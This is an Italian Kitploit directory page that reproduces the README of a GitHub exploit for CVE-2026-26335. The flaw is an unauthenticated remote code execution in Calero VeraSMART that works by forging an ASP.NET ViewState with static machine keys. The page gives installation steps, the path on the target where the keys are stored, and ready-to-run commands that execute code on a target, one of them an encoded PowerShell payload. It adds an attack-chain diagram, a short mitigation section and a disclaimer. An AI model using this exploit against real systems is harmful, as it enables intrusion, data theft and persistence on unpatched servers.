Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — # Exploit automatizzato per CVE-2026-26335, una RCE critica non autenticata in Calero VeraSMART tramite ViewState ASP.NET contraffatto utilizzando chiavi macchina statiche. Include scoperta degli endpoint, generazione del payload ed esecuzione dei comandi. | Kitploit
Strumenti/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingRed Teaming
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

CVE-2026-26335-Calero-VeraSMART-RCE

# Exploit automatizzato per CVE-2026-26335, una RCE critica non autenticata in Calero VeraSMART tramite ViewState ASP.NET contraffatto utilizzando chiavi macchina statiche. Include scoperta degli endpoint, generazione del payload ed esecuzione dei comandi.

Vedi Repository
16 mesi faNon ancora revisionato
Condividi

👤 Autore

Mohammed Idrees Banyamer Ricercatore di Sicurezza

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - Exploit RCE ViewState Calero VeraSMART

CVE Severity CVSS Platform ASP.NET Python License Author


📌 Descrizione

CVE‑2026‑26335 è una vulnerabilità critica di esecuzione remota di codice non autenticata in Calero VeraSMART (pre‑2022 R1).

L'applicazione utilizza chiavi macchina ASP.NET statiche hard‑coded condivise tra le installazioni.
Un attaccante in possesso di queste chiavi può forgiare un ASP.NET ViewState dannoso e innescare deserializzazione lato server → RCE.

Questo exploit automatizza:

  • Scoperta dell'endpoint ViewState
  • Estrazione di __VIEWSTATEGENERATOR
  • Generazione del payload ysoserial
  • Consegna del ViewState firmato
  • Esecuzione dei comandi

⚠️ Impatto

  • RCE non autenticata
  • Compromissione dell'utente IIS
  • Movimento laterale nel dominio
  • Esfiltrazione dei dati
  • Persistenza tramite webshell

🧠 Causa Principale

CWE‑321 — Chiavi crittografiche hard‑coded

Le distribuzioni VeraSMART riutilizzano la stessa machineKey ASP.NET:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

Qualsiasi attaccante con le chiavi di una singola installazione può attaccare tutte le altre.


🛠 Requisiti

  • Python 3
  • ysoserial.net
  • Chiavi macchina VeraSMART
  • Accesso di rete a IIS

⚙️ Installazione

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 Ottenere le Chiavi Macchina

Le chiavi non sono pubbliche. Ottenerle dal target:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

Oppure tramite la lettura file complementare:

CVE‑2026‑26333


🚀 Utilizzo

Verifica della vulnerabilità

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

Esecuzione di un comando

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

Endpoint specifico

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

Debug tramite proxy

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 Flusso di Sfruttamento

  1. Trovare l'endpoint ViewState
  2. Estrarre il generatore
  3. Generare il payload firmato
  4. Inviare il ViewState forgiato
  5. Deserializzazione ASP.NET
  6. Esecuzione dei comandi

📊 CVSS

9.8 — Critico AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 Testato Su

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022 (pre‑R1)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 Mitigazione

Corretto in VeraSMART 2022 R1:

  • Chiavi macchina univoche
  • Hardening del ViewState
  • Archiviazione sicura delle chiavi

Soluzioni alternative:

  • Ruotare la machineKey
  • Disabilitare il ViewState
  • Limitare l'esposizione di IIS
  • Regole WAF per il ViewState

📚 Riferimenti

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ Disclaimer

Solo per scopi educativi e test autorizzati. Utilizzare esclusivamente su sistemi di propria proprietà o per i quali si dispone dell'autorizzazione a testare.


👤 Autore

Mohammed Idrees Banyamer Ricercatore di Sicurezza

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 Diagramma dell'Exploit

Il seguente diagramma illustra la catena di sfruttamento di CVE‑2026‑26335 in Calero VeraSMART, dove le chiavi macchina ASP.NET statiche consentono di forgiare un ViewState dannoso che porta all'esecuzione remota di codice.

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
Scarica lo strumento